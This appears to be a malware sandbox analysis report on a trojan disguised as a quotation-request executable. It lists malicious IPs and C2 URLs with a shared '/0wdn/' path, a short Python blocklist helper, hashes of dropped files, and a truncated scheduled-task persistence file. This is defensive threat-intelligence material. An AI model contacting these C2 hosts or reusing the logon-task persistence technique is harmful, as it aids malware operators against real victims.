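    """Deduplicated, sorted host list for a DNS sinkhole or proxy deny list."""
    return sorted({parse_c2_url(url)[0] for url in urls})


if __name__ == "__main__":
    for path, hosts in cluster_by_path(CONTACTED_URLS).items():
        print(f"path {path}: {len(hosts)} hosts")
    print("stable parameters:", shared_param_values(CONTACTED_URLS))
    print("blocklist:", ", ".join(blocklist(CONTACTED_URLS)))
```

Run against the table, the script reports a single /0wdn/ cluster of eight hosts and v2MHc=3fPHVZWhu2EdAZf0 as the only stable parameter; nfuxZr is excluded because it has seven distinct values. Treat the host list as the blocking indicator and the path plus stable parameter as the hunting pattern, since the same path recurs on other sample contexts later in this report under different hosts.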

                                            URLs from Memory and Binaries

Memory dump sources referenced below:
[A] Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp
[B] explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp
[C] cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp
[D] Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp

URL names are reproduced exactly as extracted from the memory dumps, including trailing characters such as G, D or DPlease.

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | [A], [B] | false | | high
http://www.fontbureau.com/designers/? | [A], [B] | false | | high
http://www.founder.com.cn/cn/bThe | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.fontbureau.com/designers? | [A], [B] | false | | high
http://www.tiro.com | [B] | false | URL Reputation: safe (3 results) | unknown
http://www.fontbureau.com/designers | [B] | false | | high
https://static.loopia.se/responsive/images/footer/logo-grey.png | [C] | false | | high
http://www.goodfont.co.kr | [A], [B] | false | URL Reputation: safe (3 results) | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | [D] | false | | high
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | [C] | false | | high
http://www.sajatypeworks.com | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.typography.netD | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.founder.com.cn/cn/cThe | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://fontfabrik.com | [A], [B] | false | URL Reputation: safe (3 results) | unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | [C] | false | | high
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | [C] | false | | high
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | [C] | false | | high
http://www.galapagosdesign.com/DPlease | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.fonts.com | [A], [B] | false | | high
http://www.sandoll.co.kr | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.urwpp.deDPlease | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.zhongyicts.com.cn | [A], [B] | false | URL Reputation: safe (3 results) | unknown
https://static.loopia.se/responsive/images/extra_pages/website.svg | [C] | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | [D] | false | | high
http://www.sakkal.com | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.apache.org/licenses/LICENSE-2.0 | [A], [B] | false | | high
http://www.fontbureau.com | [A], [B] | false | | high
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | [C] | false | | high
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | [C] | false | | high
http://www.carterandcone.coml | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | [A], [B] | false | | high
http://www.founder.com.cn/cn | [A], [B] | false | URL Reputation: safe (3 results) | unknown
http://www.fontbureau.com/designers/frere-jones.html | [A], [B] | false | | high
http://www.jiyu-kobo.co.jp/ | [A], [B] | false | URL Reputation: safe (3 results) | unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | [C] | false | | high
http://www.fontbureau.com/designers8 | [A], [B] | false | | high
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | [C] | false | | high
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | [C] | false | | high
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | [C] | false | | high
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | [C] | false | | high

                                                                                              Contacted IPs

                                                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
194.9.94.85 | unknown | Sweden | 39570 | LOOPIASE | true
77.72.1.202 | unknown | United Kingdom | 12488 | KRYSTALGR | true
160.153.133.87 | unknown | United States | 21501 | GODADDY-AMSDE | true
51.83.43.226 | unknown | France | 16276 | OVHFR | true
194.59.164.34 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
138.197.103.178 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
107.180.46.143 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356530
Start date: 23.02.2021
Start time: 09:37:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Quotation Reques.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/4@14/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 5.2% (good quality ratio 4.8%)
• Quality average: 69.5%
• Quality standard deviation: 29.7%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.193.48, 51.103.5.186, 51.104.139.180, 104.42.151.234, 92.122.145.220, 13.64.90.137, 52.255.188.83, 184.30.20.56, 93.184.221.240, 84.53.167.113, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                                                                              • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, wildcard.weather.microsoft.com.edgekey.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              Time | Type | Description
                                                                                              09:38:18 | API Interceptor | 1x Sleep call for process: Quotation Reques.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                              194.9.94.85 | ChTY1xID7P.exe | Get hash | malicious | Browse
                                                                                              • www.probysweden.com/8rg4/?Rl7=XPv4nRgx&GFNP=8pcdT7K99SvBQHTN+kjNsXfvUIHRUDFhxAeFzgkHCKQVnHSzPx8Ea4QrQgUoryMED7RU
                                                                                               | W08347.exe | Get hash | malicious | Browse
                                                                                              • www.dorteklarskov.com/0wdn/?J2JxbP=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapXhuVOlkSupz&BXLtz=E0GDCV7XwLQ
                                                                                               | SWIFT USD 354,883.00.exe | Get hash | malicious | Browse
                                                                                              • www.snoozefest.online/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=inDXmCoEVF959MsR4qZlCH19qTUcVF3lG0+EShDQun1EUEu815VAvl2FbkxM0G42/NXi
                                                                                               | SKM_C3350191107102300.exe | Get hash | malicious | Browse
                                                                                              • www.markenvandrerhjem.com/x2ee/?pPc=jtk0Cpl66flEdmtCCJ0ooXo12vEeYTLWsb93X6dmRn/uvFp2MWw7u7nXNBsvWHmLQYfJ&1bS=WXrtCRKPa
                                                                                               | dhlShipment Document BL,INV and Packing List Attached.exe | Get hash | malicious | Browse
                                                                                              • www.xn--abonnemangshjlpen-2qb.com/bw43/
                                                                                               | 19Payslip_PDF.exe | Get hash | malicious | Browse
                                                                                              • www.narvikfjelletbooking.com/m1/
                                                                                               | 20Payment confirmation.exe | Get hash | malicious | Browse
                                                                                              • www.ecosnus.com/je/
                                                                                               | L7QK2rAwZ9.doc | Get hash | malicious | Browse
                                                                                              • www.frolundatandlakarna.com/sree/premium/?id=x9WAXH6klaRMFy6O3HZ8WwcmdK9M7QMpZc3ICl80vZnUl7CgvcSQRnWTS94Br8jxamIB2jL3/pd9c7Kj6+bsRA==
                                                                                               | 38PO172011.exe | Get hash | malicious | Browse
                                                                                              • www.konsulttjanst.com/br/?id=hqBjOrDlf6AwvR9BonInjJJmaMaNMF-QwMZAWdLxXzuDzmGQwkY8LFj1BsF8oA_GI4QP_WpyHrf6inbK
                                                                                               | MX-M452N_20190403_180650.exe | Get hash | malicious | Browse
                                                                                              • www.connectionvbv.com/la/
                                                                                              77.72.1.202 | TN22020000560175.exe | Get hash | malicious | Browse
                                                                                              • www.thisisauckland.com/0wdn/?MR4ta=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&Vnt4B=-Zd0izgp5Bkt8FY
                                                                                              160.153.133.87 | order no. 43453.exe | Get hash | malicious | Browse
                                                                                              • www.sphenecouture.com/0wdn/?xPJXwJsp=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9DeHOjFlv0pq&1bw=L6A4n6n0CLA064Qp
                                                                                               | order no. 3643.exe | Get hash | malicious | Browse
                                                                                              • www.sphenecouture.com/0wdn/?QzuP3V=KfvDIX0H&Bl=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt
                                                                                               | TN22020000560175.exe | Get hash | malicious | Browse
                                                                                              • www.sphenecouture.com/0wdn/?MR4ta=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt&Vnt4B=-Zd0izgp5Bkt8FY
                                                                                              51.83.43.226 | 2143453.exe | Get hash | malicious | Browse
                                                                                              • www.trainingkanban.com/0wdn/?v2=Wh0xlrm&k8Phg=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+WHSrwtfokhi
                                                                                              194.59.164.34 | TN22020000560175.exe | Get hash | malicious | Browse
                                                                                              • www.gurumanindustries.com/0wdn/?MR4ta=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&Vnt4B=-Zd0izgp5Bkt8FY

                                                                                              Domains

                                                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                              www.dorteklarskov.com | W08347.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.85
                                                                                              www.trainingkanban.com | 2143453.exe | Get hash | malicious | Browse
                                                                                              • 51.83.43.226
                                                                                              www.ficuswildlife.com | W08347.exe | Get hash | malicious | Browse
                                                                                              • 52.58.78.16
                                                                                              www.buildermarketingprogram.com | TN22020000560175.exe | Get hash | malicious | Browse
                                                                                              • 208.97.149.17
                                                                                               | Quote.exe | Get hash | malicious | Browse
                                                                                              • 208.97.149.17
                                                                                               | SHANDONG.exe | Get hash | malicious | Browse
                                                                                              • 208.97.149.17

                                                                                              ASN

                                                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                              GODADDY-AMSDE | 4pFzkB6ePK.exe | Get hash | malicious | Browse
                                                                                              • 160.153.128.38
                                                                                               | NewOrder.xlsm | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | 22 FEB -PROCESSING.xlsx | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | AWB-INVOICE_PDF.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | 7R29qUuJef.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | YSZiV5Oh2E.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | urgent specification request.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | Shinshin Machinery.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | CMahQwuvAE.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | PO#652.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | Claim-1097837726-02162021.xls | Get hash | malicious | Browse
                                                                                              • 160.153.137.40
                                                                                               | Claim-509072992-02162021.xls | Get hash | malicious | Browse
                                                                                              • 160.153.137.40
                                                                                               | wfEePDdnmR.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | 955037-012021-98_98795947.doc | Get hash | malicious | Browse
                                                                                              • 160.153.137.14
                                                                                               | po.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | Details!!.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | AANK5mcsUZ.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | PvvkzXgMjG.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | tXoqs48Ta9.rtf | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                               | q2o0a1neTm.exe | Get hash | malicious | Browse
                                                                                              • 160.153.136.3
                                                                                              LOOPIASE | YOUR PRODUCT.doc | Get hash | malicious | Browse
                                                                                              • 93.188.1.220
                                                                                               | Quote QU038097.doc | Get hash | malicious | Browse
                                                                                              • 93.188.2.51
                                                                                               | IMG_51067.doc__.rtf | Get hash | malicious | Browse
                                                                                              • 93.188.2.51
                                                                                               | Invoice.doc | Get hash | malicious | Browse
                                                                                              • 93.188.2.51
                                                                                               | ChTY1xID7P.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.85
                                                                                               | PO2364#FD21200.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.86
                                                                                               | PO2836#NZ232.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.86
                                                                                               | exhibition-template236-2021 Rfq.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.86
                                                                                               | 6OUYcd3GIs.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.86
                                                                                               | W08347.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.85
                                                                                               | QUOTATION REQUEST.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.86
                                                                                               | SWIFT USD 354,883.00.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.85
                                                                                               | SKM_C3350191107102300.exe | Get hash | malicious | Browse
                                                                                              • 194.9.94.85
                                                                                               | RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | Get hash | malicious | Browse
                                                                                              • 93.188.2.53
                                                                                               | 66484473877.xls | Get hash | malicious | Browse
                                                                                              • 93.188.1.220
                                                                                               | Shipment Details 01.exe | Get hash | malicious | Browse
                                                                                              • 93.188.3.14
                                                                                               | Shipment Details.exe | Get hash | malicious | Browse
                                                                                              • 93.188.3.11
                                                                                               | 661976143337.xls | Get hash | malicious | Browse
                                                                                              • 93.188.2.52
                                                                                               | Swift Copy.exe | Get hash | malicious | Browse
                                                                                              • 93.188.3.14
                                                                                               | 661976143337.xls | Get hash | malicious | Browse
                                                                                              • 93.188.2.52
                                                                                              KRYSTALGR | tS9P6wPz9x.exe | Get hash | malicious | Browse
                                                                                              • 77.72.5.145
                                                                                               | ransomware.exe | Get hash | malicious | Browse
                                                                                              • 77.72.5.145
                                                                                               | ransomware.exe | Get hash | malicious | Browse
                                                                                              • 77.72.5.145
                                                                                               | ZRz0Aq1Rf0.dll | Get hash | malicious | Browse
                                                                                              • 77.72.0.194
                                                                                               | gc79a7rUNV.exe | Get hash | malicious | Browse
                                                                                              • 77.72.0.194
                                                                                               | univarsolutions-01-02-21 Statement_607376Y2lhcmFuLmJyYW5pZmY=.htm | Get hash | malicious | Browse
                                                                                              • 185.53.59.20
                                                                                               | 15t12mg4Jb.exe | Get hash | malicious | Browse
                                                                                              • 77.72.0.126
                                                                                               | 8nU6IwdYTp.exe | Get hash | malicious | Browse
                                                                                              • 77.72.0.126
                                                                                               | TN22020000560175.exe | Get hash | malicious | Browse
                                                                                              • 77.72.1.202
                                                                                               | Shipping Documents.xlsx | Get hash | malicious | Browse
                                                                                              • 77.72.0.166
                                                                                               | Payment.xlsx | Get hash | malicious | Browse
                                                                                              • 77.72.0.166
                                                                                               | Misc supplies.xlsx | Get hash | malicious | Browse
                                                                                              • 77.72.0.166
                                                                                               | udtiZ6qM4s.exe | Get hash | malicious | Browse
                                                                                              • 77.72.1.27
                                                                                               | uM0FDMSqE2.exe | Get hash | malicious | Browse
                                                                                              • 185.199.220.27
                                                                                               | kvdYhqN3Nh.exe | Get hash | malicious | Browse
                                                                                              • 185.53.56.90
                                                                                               | 9qB3tPamJa.exe | Get hash | malicious | Browse
                                                                                              • 185.199.220.27
                                                                                               | https://justtradeservices.co.uk/ | Get hash | malicious | Browse
                                                                                              • 77.72.4.13
                                                                                               | Se adjunta un nuevo pedido.exe | Get hash | malicious | Browse
                                                                                              • 77.72.1.27
                                                                                               | https://wallofsound.co.uk/wellaccessdocumentsecured/Drive | Get hash | malicious | Browse
                                                                                              • 185.53.59.148
                                                                                               | #U260e#Ufe0f#Ufffd#Ufffdmineralresources.com.au.htm | Get hash | malicious | Browse
                                                                                              • 185.53.59.227

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation Reques.exe.log
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):1314
                                                                                              Entropy (8bit):5.350128552078965
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                              Malicious:true
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                              C:\Users\user\AppData\Local\Temp\tmp1923.tmp
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1644
                                                                                              Entropy (8bit):5.168396886992961
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB1Ptn:cbhC7ZlNQF/rydbz9I3YODOLNdq3p
                                                                                              MD5:1BF9853001A0DBB1C19F15A6EDE92E65
                                                                                              SHA1:45EF1D7D64F2994F602A2C78AAD375C35315BD52
                                                                                              SHA-256:72F2B78F4787E9E88D4FF93F0585158549D64E309E310AE31A0C5DB83DC8680B
                                                                                              SHA-512:4FD771CB2496F7960DBA0A5EBE1986673259C9D16E6B02AEE34DCE769E9C71C65C0D04A24684388AE04BAF2077AB86087D6912627A5E61D4455BF88A6E39EF1D
                                                                                              Malicious:true
                                                                                              Reputation:low
                                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                                              C:\Users\user\AppData\Roaming\ftkqUsB.exe
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):549376
                                                                                              Entropy (8bit):7.243576126403181
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:5KLHi+NxBkVTGvbN/1qLs+I1Ul3vJPYcuxQULDGkUp1ea9IlL:5Ai+NcVTANqLsViExdy51Xo
                                                                                              MD5:5A752FCD71ACB65C618A829610B7B7E1
                                                                                              SHA1:1E0608C292A70E30F75308255D6039A8CA373D8A
                                                                                              SHA-256:D96042B51F171F68A99D4568F311F267FE595DF0ADD3851E162CBCEE7F897EDB
                                                                                              SHA-512:BD8F7AA85DCF6FF042AA359637547ADF8CE1BE8C0BA535067E0FBFB85080CB03A249CCD176230C37F486AD486761EDB739DB705FA5B8F2CB859929C83D88ED8A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                                              Reputation:low
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TL4`..............P..D..........rc... ........@.. ....................................@................................. c..O.................................................................................... ............... ..H............text...xC... ...D.................. ..`.rsrc................F..............@..@.reloc...............`..............@..B................Tc......H........x..HS..............0............................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......
                                                                                              C:\Users\user\AppData\Roaming\ftkqUsB.exe:Zone.Identifier
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: [ZoneTransfer]....ZoneId=0

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.243576126403181
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:Quotation Reques.exe
                                                                                              File size:549376
                                                                                              MD5:5a752fcd71acb65c618a829610b7b7e1
                                                                                              SHA1:1e0608c292a70e30f75308255d6039a8ca373d8a
                                                                                              SHA256:d96042b51f171f68a99d4568f311f267fe595df0add3851e162cbcee7f897edb
                                                                                              SHA512:bd8f7aa85dcf6ff042aa359637547adf8ce1be8c0ba535067e0fbfb85080cb03a249ccd176230c37f486ad486761edb739db705fa5b8f2cb859929c83d88ed8a
                                                                                              SSDEEP:12288:5KLHi+NxBkVTGvbN/1qLs+I1Ul3vJPYcuxQULDGkUp1ea9IlL:5Ai+NcVTANqLsViExdy51Xo
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TL4`..............P..D..........rc... ........@.. ....................................@................................

                                                                                              File Icon

                                                                                              Icon Hash:0e4c714480900000

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x476372
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                              Time Stamp:0x60344C54 [Tue Feb 23 00:29:08 2021 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

